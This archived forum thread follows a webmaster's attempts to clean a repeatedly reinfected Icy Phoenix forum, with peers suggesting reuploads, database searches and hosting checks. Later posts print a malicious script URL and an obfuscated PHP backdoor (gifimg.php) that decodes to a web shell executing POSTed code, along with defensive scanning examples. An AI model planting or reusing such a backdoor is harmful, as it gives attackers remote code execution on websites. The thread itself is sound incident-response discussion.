Old Support Topics - Forum Virus



Nvidia2012 [ Wed 18 Nov, 2009 21:47 ]
Post subject: Forum Virus
Hello friends, this time I have the following little problem ... a virus got into my forum a few weeks ago; afterwards I transferred the files to a brand new hosting ... not infected, but today my forum got infected again ... the virus is an iframe.

The truth is that this is a problem that is driving me crazy; I hope to find something I can do to resolve it.

I use Icy Phoenix version 1.3.0.53

My Forum website is: http://foro.mu-trujillo.net


Yros [ Wed 18 Nov, 2009 21:52 ]
Post subject: Re: Forum Virus
Your site is considered dangerous by Google / Firefox...
Anyway, did you AT LEAST try to remove EVERY file and upload new ones? If one of your files has been infected, it should clear the problem. Just reupload the site.

Also take a look at this topic. It may help you.


Nvidia2012 [ Thu 19 Nov, 2009 02:09 ]
Post subject: Re: Forum Virus
Yros wrote:
Your site is considered dangerous by Google / Firefox...
Anyway, did you AT LEAST try to remove EVERY file and upload new ones? If one of your files has been infected, it should clear the problem. Just reupload the site.

Also take a look at this topic. It may help you.


Hello, I just uploaded completely new files again, and even left my hosting totally empty, but after a few days it got re-infected; I was thinking that maybe there is someone behind this.


KasLimon [ Thu 19 Nov, 2009 09:44 ]
Post subject: Re: Forum Virus
I can access just fine...

Google considers sites dangerous when you have some virus or when you try to defraud people... It's not usual for a normal website to be considered dangerous... Anyway, I think there's always a link saying "I am the webmaster, this is an error" or something like that, so you can try to make them delete the warning.

Greets!


spydie [ Thu 19 Nov, 2009 16:59 ]
Post subject: Re: Forum Virus
You should recheck all publicity placed by you on your site.

Google considers many announcements that don't come from itself (Google) as dangerous.

For example (www.amigos.com)


Yros [ Thu 19 Nov, 2009 17:04 ]
Post subject: Re: Forum Virus
It seems to be fixed, doesn't it?


spydie [ Thu 19 Nov, 2009 23:45 ]
Post subject: Re: Forum Virus
Problem is, once in the Google blacklist, you stay there for about 90 days.


Nvidia2012 [ Sat 21 Nov, 2009 23:24 ]
Post subject: Re: Forum Virus
Hi, the problem is caused by a virus (iframe), and obviously when you have a virus on your website Google marks your website as dangerous; the problem is how the virus infects my forum, which is a big issue to me .... The only thing I do to fix it is delete everything and upload again ... but that's not a real solution because it is not infecting the Forum; sometimes the virus leaves the forum blank, as is happening to me now ...

I hope you can help me thanks!


spydie [ Sat 21 Nov, 2009 23:56 ]
Post subject: Re: Forum Virus
If you know where this comes from, you can try to block it out with the .htaccess file.


Nvidia2012 [ Mon 23 Nov, 2009 15:32 ]
Post subject: Re: Forum Virus
The virus is the following script ...

Code:
http://bumin.org/buminbbc_yuntan/test.php


Help Please !!


Nvidia2012 [ Sat 28 Nov, 2009 03:40 ]
Post subject: Re: Forum Virus
Script Virus View

Help Please


novice programmer [ Sat 28 Nov, 2009 18:52 ]
Post subject: Re: Forum Virus
Hey spydie, I hope you do not mind me hijacking "your thread".

Nvidia2012, have you tried to scan your computer with an up-to-date antirootkit, antivirus and antispyware (all of them; BTW, that is the preferred order of scanning)?

If you do not have one or any of these kinds of products, there are some of them available on the net for free for your installation lifetime (and with very good quality, BTW). You can PM me if you want and I will gladly let you know about some of them.

BTW, do not rely on Panda's cloud AV. It does not actually scan the files, in the full meaning of "scan".

If you are sure the virus is not on your computer, nor in the server's files, try getting a full backup of all your Icy tables in the DB, and find the string that is the virus URL. I do recommend partial searches...

I recommend looking for:

Code:
bumin.org
buminbbc_yuntan
test.php
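
The partial search suggested in the post above, as an added example that is not part of the original thread: it scans a text SQL dump for the three substrings and for iframe tags, and groups the hits by table. The table names and dump rows are constructed sample data, and reading the table name from `INSERT INTO` lines assumes a mysqldump-style export.

```python
import html
import re
from collections import defaultdict

# Partial search strings recommended in the post above.
INDICATORS = ("bumin.org", "buminbbc_yuntan", "test.php")
IFRAME = re.compile(r"<\s*iframe\b", re.IGNORECASE)
# Assumption: mysqldump-style text export, one INSERT statement per line.
INSERT = re.compile(r"^\s*INSERT\s+INTO\s+`?(\w+)`?", re.IGNORECASE)

# Constructed sample dump; table names and rows are made up for illustration.
SAMPLE_DUMP = """\
INSERT INTO `demo_config` VALUES ('site_desc', 'My forum');
INSERT INTO `demo_posts` VALUES (1, 'hello world');
INSERT INTO `demo_posts` VALUES (2, 'hi &lt;iframe src="http://bumin.org/buminbbc_yuntan/test.php"&gt;');
"""

def scan_dump(lines):
    """Return {table: [(line_no, [matched terms])]} for the lines of a SQL dump."""
    hits = defaultdict(list)
    table = "(before first INSERT)"
    for no, line in enumerate(lines, 1):
        m = INSERT.match(line)
        if m:
            table = m.group(1)
        # Unescape entities so stored text such as &lt;iframe is still caught.
        text = html.unescape(line).lower()
        found = [s for s in INDICATORS if s in text]
        if IFRAME.search(text):
            found.append("<iframe")
        if found:
            hits[table].append((no, found))
    return dict(hits)

if __name__ == "__main__":
    for table, rows in scan_dump(SAMPLE_DUMP.splitlines()).items():
        print(table, rows)
```

A hit on `test.php` alone is weak evidence, since the name is common; hits that combine it with the other two strings or with an iframe tag are the rows to inspect first.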


Mighty Gorgon [ Sat 28 Nov, 2009 20:40 ]
Post subject: Re: Forum Virus
Are you sure your hosting service is secure?

Some injections have been recently developed to exploit some security holes in hosting services.


novice programmer [ Sun 29 Nov, 2009 15:37 ]
Post subject: Re: Forum Virus
Mighty Gorgon wrote:
Are you sure your hosting service is secure?

Some injections have been recently developed to exploit some security holes in hosting services.


That is totally true, but I think we should first consider the possibility that the user had his own DB/scripts exploited, since he reports he has changed the hosting and the problem still persists.

But, in order to discard that, could you tell us:

- If you are on a shared hosting, a VPS or a dedicated server?
- If you have any other server-side software that is out of date, and therefore could be exploited, causing the problem?
- If you know any other users in your hosting service that could have the same problem as you?

Please note that if you are on a free hosting you could have migrated from a hoster to any of their resellers, or perhaps the other way around....

BTW, remember to review your CHMOD for all your files when you get rid of this nasty thing. It is the first common error among non-professional developers (in which I must include myself, I am just an amateur....).


Nvidia2012 [ Sat 05 Dec, 2009 02:35 ]
Post subject: Re: Forum Virus
Hello.

I have reviewed the tables and the database and there are no SQL injections or malicious code...


Mighty Gorgon [ Fri 11 Dec, 2009 21:14 ]
Post subject: Re: Forum Virus
Did you check your cookie?


Nvidia2012 [ Sat 19 Dec, 2009 16:46 ]
Post subject: Re: Forum Virus
Mighty Gorgon wrote:
Did you check your cookie?


Yes, it seems that someone is infected or at least the PC is infected ... antivirus knows someone who could fix the problem.


Nvidia2012 [ Sun 20 Dec, 2009 17:50 ]
Post subject: Re: Forum Virus
Hello.

I have been reviewing, and within the images folder I found a strange file that was never there before; it is: gifimg.php

Its code is as follows ...

Code:
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>


I hope I can help. Thanks


KasLimon [ Sun 20 Dec, 2009 23:54 ]
Post subject: Re: Forum Virus
Definitely, someone exploited your files...

That code means...
Code:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all its code with
Code:
<?php
die();
?>
Then give that file read-only permissions (644).

It's not a definitive solution, but it might prevent the virus from appearing again.

Then check your files to see if you can find gifimg in their content, or some base64_decode functions...
I suggest you check common.php, includes/constants.php, includes/page_header.php...


novice programmer [ Sat 02 Jan, 2010 20:08 ]
Post subject: Re: Forum Virus
KasLimon wrote:
Definitely, someone exploited your files...

That code means...
Code:
if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');
So this just gets some code through POST vars and executes it.

Try this: edit that file and replace all its code with
Code:
<?php
die();
?>
Then give that file read-only permissions (644).

It's not a definitive solution, but it might prevent the virus from appearing again.

Then check your files to see if you can find gifimg in their content, or some base64_decode functions...
I suggest you check common.php, includes/constants.php, includes/page_header.php...


If the hacker is smart enough, he could have cloaked the file name, so also check for any eval function in all the website code.

BTW, this could be a bug in Icy or in any other software you have....
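
A static check for the two suggestions above (search the files for base64_decode, and for any eval in the site code), as an added example that is not part of the original thread and not Icy Phoenix code: it walks a directory tree, decodes nested `base64_decode('...')` literals as text without executing anything, and reports what each layer contains. The sample tree, its file names and its harmless payload are constructed.

```python
import base64, os, re, tempfile

# Constructs the thread says to look for, request input, and quoted base64 literals.
SUSPICIOUS = re.compile(r"\b(eval|base64_decode)\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]", re.I)

def peel(source, max_layers=5):
    """Decode nested base64_decode('literal') layers as text; nothing is executed."""
    layers = [source]
    for _ in range(max_layers):
        m = B64_LITERAL.search(layers[-1])
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            break
        layers.append(raw.decode("utf-8", "replace"))
    return layers

def scan_tree(root):
    """Return {relative path: sorted findings} for each .php file under root."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.lower().endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                layers = peel(fh.read())
            found = set()
            for depth, text in enumerate(layers):
                found.update(f"layer{depth}:{m[1].lower()}" for m in SUSPICIOUS.finditer(text))
                if REQUEST_INPUT.search(text):
                    found.add(f"layer{depth}:request-input")
            if found:
                report[os.path.relpath(path, root)] = sorted(found)
    return report

def demo():
    """Scan a constructed tree: one clean file, one obfuscated harmless stand-in."""
    inner = b"print(strlen($_POST['e']));"  # constructed, harmless payload
    wrapped = "<?php eval(base64_decode('%s'));?>" % base64.b64encode(inner).decode()
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "images"))
        for rel, body in (("index.php", "<?php echo 'hello'; ?>"),
                          (os.path.join("images", "sample.php"), wrapped)):
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Run `scan_tree()` on a downloaded copy of the site; legitimate code can also call `eval` or `base64_decode`, so compare each hit against a clean copy of the same release before deleting anything.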



